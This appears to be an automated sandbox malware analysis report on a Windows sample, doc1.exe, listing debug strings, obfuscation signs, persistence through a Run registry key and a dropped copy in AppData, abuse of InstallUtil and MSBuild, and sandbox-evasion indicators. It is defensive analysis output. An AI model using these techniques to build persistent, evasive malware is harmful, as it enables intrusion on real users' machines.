                  Source: Binary string: ?pnC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2456725368.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2555966193.0000000000FD8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700081075.00000000006F8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2863825564.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3036386294.0000000000F58000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdb" source: MSBuild.exe, 00000023.00000002.2865138161.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Drawing.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdb3 source: MSBuild.exe, 00000029.00000002.3038113235.0000000001331000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdb4 source: WERABFD.tmp.dmp.43.dr, WER2A88.tmp.dmp.31.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb!z source: MSBuild.exe, 00000023.00000002.2864210130.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\exe\MSBuild.pdbV source: MSBuild.exe, 00000029.00000002.3038113235.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\exe\MSBuild.pdbS source: MSBuild.exe, 00000023.00000002.2864210130.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdbl)B source: MSBuild.exe, 00000029.00000002.3038923676.00000000013E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Accessibility.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: System.pdbxW source: WERF2AF.tmp.dmp.24.dr
                  Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb== source: MSBuild.exe, 0000000C.00000002.2457220076.0000000000F43000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdbJ@2 source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: System.Core.ni.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: osymbols\exe\MSBuild.pdb source: MSBuild.exe, 0000001D.00000002.2700081075.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Drawing.pdb4 source: WERC3B0.tmp.dmp.15.dr
                  Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbsers\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:r source: MSBuild.exe, 00000029.00000002.3038923676.00000000013FF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Accessibility.pdbH source: WER69E3.tmp.dmp.37.dr
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbeh source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E71000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700280840.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3038113235.0000000001331000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: HPdn0C:\Windows\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2456725368.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2555966193.0000000000FD8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700081075.00000000006F8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2863825564.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3036386294.0000000000F58000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: MSBuild.exe, 00000016.00000002.2558663468.00000000014CC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.PDB89 source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: @pn.pdb5w source: MSBuild.exe, 00000023.00000002.2863825564.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: System.ni.pdbRSDS source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: doc1.exe, 00000001.00000002.2293545434.0000000002BB8000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2301644426.0000000003A51000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2304587014.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, doc1.exe, 00000001.00000002.2301644426.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2514918808.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2593909614.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2615450393.00000000043AB000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb~x+h5 source: MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdb089 source: MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\MSBuild.pdb.x source: MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: mscorlib.pdbL}f source: MSBuild.exe, 00000016.00000002.2558663468.00000000014CC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\MSBuild.pdbpdbild.pdb source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2864210130.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.VisualBasic.pdbH source: WER2A88.tmp.dmp.31.dr
                  Source: Binary string: System.Core.pdb`d source: WERABFD.tmp.dmp.43.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: symbols\exe\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2456725368.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2555966193.0000000000FD8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2863825564.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3036386294.0000000000F58000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: System.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: inaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbll source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Drawing.pdbt source: WERF2AF.tmp.dmp.24.dr
                  Source: Binary string: System.Windows.Forms.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: System.Drawing.pdbL08w# source: WERABFD.tmp.dmp.43.dr
                  Source: Binary string: \??\C:\Windows\exe\MSBuild.pdb;h source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E71000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2558663468.0000000001468000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3038113235.0000000001331000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\MSBuild.pdbB@* source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: @pn.pdb source: MSBuild.exe, 0000000C.00000002.2456725368.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2555966193.0000000000FD8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700081075.00000000006F8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3036386294.0000000000F58000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdbn source: MSBuild.exe, 00000023.00000002.2864210130.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb*p source: MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb0q source: MSBuild.exe, 0000000C.00000002.2456725368.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.VisualBasic.pdbhWH source: WERF2AF.tmp.dmp.24.dr
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb* source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdbd5 source: MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr

                  Data Obfuscation

                  Source: doc1.exe, Uofmwwt.cs.Net Code: Epzyany System.AppDomain.Load(byte[])
                  Source: 1.2.doc1.exe.3acd5b0.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 1.2.doc1.exe.3acd5b0.2.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                  Source: 1.2.doc1.exe.3a7d590.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 1.2.doc1.exe.3a7d590.5.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                  Source: 1.2.doc1.exe.3b1bdd0.3.raw.unpack, Uofmwwt.cs.Net Code: Epzyany System.AppDomain.Load(byte[])
                  Source: Yara matchFile source: 1.2.doc1.exe.56f0000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.2293545434.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2303816567.00000000056F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.2593909614.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2514918808.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: doc1.exe PID: 6400, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: bosotkm.exe PID: 1864, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: bosotkm.exe PID: 1292, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_01066330 push esp; retf 1_2_01066331
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_057E5A54 push es; retf 1_2_057E5A57
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_0580327C push ebx; iretd 1_2_0580327F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DD24B9 push 8BFFFFFFh; retf 4_2_00DD24BF
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_016367F7 pushad ; iretd 11_2_016367F9
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_016367D8 pushad ; iretd 11_2_016367DA
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_016367BA pushad ; iretd 11_2_016367BB
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_01636833 pushad ; iretd 11_2_01636834
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_01636814 pushad ; iretd 11_2_01636815
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_01637165 push esi; iretd 11_2_01637166
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_01637142 push esi; iretd 11_2_01637144
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_01637124 push edi; iretd 11_2_01637125
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_01637105 push edi; iretd 11_2_01637106
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_016371EC push esi; iretd 11_2_016371EE
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_016371CD push esi; iretd 11_2_016371CF
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_016371AB push esi; iretd 11_2_016371AD
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_0163705E push edi; iretd 11_2_0163705F
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_016370E5 push edi; iretd 11_2_016370E7
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_016370C1 push edi; iretd 11_2_016370C2
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_01637080 push edi; iretd 11_2_01637081
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_0163709E push edi; iretd 11_2_016370A0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_01637365 push esp; iretd 11_2_01637367
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_01637343 push esp; iretd 11_2_01637345
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_01637322 push ebp; iretd 11_2_01637323
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_016373F6 push esp; iretd 11_2_016373F8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_016373D5 push esp; iretd 11_2_016373D6
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_016373AD push esp; iretd 11_2_016373AE
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_01637385 push esp; iretd 11_2_01637386
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_01637273 push ebp; iretd 11_2_01637279
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_0163724E push ebp; iretd 11_2_01637254
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_0163720E push esi; iretd 11_2_01637210
                  Source: doc1.exeStatic PE information: section name: .text entropy: 7.920829116713707
                  Source: bosotkm.exe.1.drStatic PE information: section name: .text entropy: 7.920829116713707

                  Persistence and Installation Behavior

                  Source: C:\Windows\SysWOW64\wscript.exe File created: C:\Users\user\AppData\Roaming\fNUATsLGslepRpn.vbs
                  Source: C:\Users\user\Desktop\doc1.exe File created: C:\Users\user\AppData\Roaming\bosotkm.exe
                  Source: C:\Users\user\Desktop\doc1.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bosotkm
                  Source: C:\Users\user\Desktop\doc1.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: Yara match File source: Process Memory Space: doc1.exe PID: 6400, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: bosotkm.exe PID: 1864, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: bosotkm.exe PID: 1292, type: MEMORYSTR
                  Source: doc1.exe, 00000001.00000002.2293545434.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2514918808.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2593909614.00000000032E1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\Desktop\doc1.exe Memory allocated: 1060000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\doc1.exe Memory allocated: 2A50000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\doc1.exe Memory allocated: 4A50000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: DD0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2A10000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2840000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exe Memory allocated: 15F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exe Memory allocated: 30B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exe Memory allocated: 50B0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 1030000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2C90000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2AC0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exe Memory allocated: 1740000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exe Memory allocated: 32E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exe Memory allocated: 52E0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2A00000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2BD0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 4BD0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 17F0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 3130000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 5130000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 13D0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2E50000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 4E50000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 26B0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2730000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 4730000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 1270000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2D00000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2C20000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 1300000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2F40000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2D80000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 600000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595594
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595375
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595265
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595156
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594933
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594828
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594716
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594426
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594281
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594139
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599671
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599343
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599233
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599124
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599015
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598796
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598577
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598358
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598248
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597921
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597718
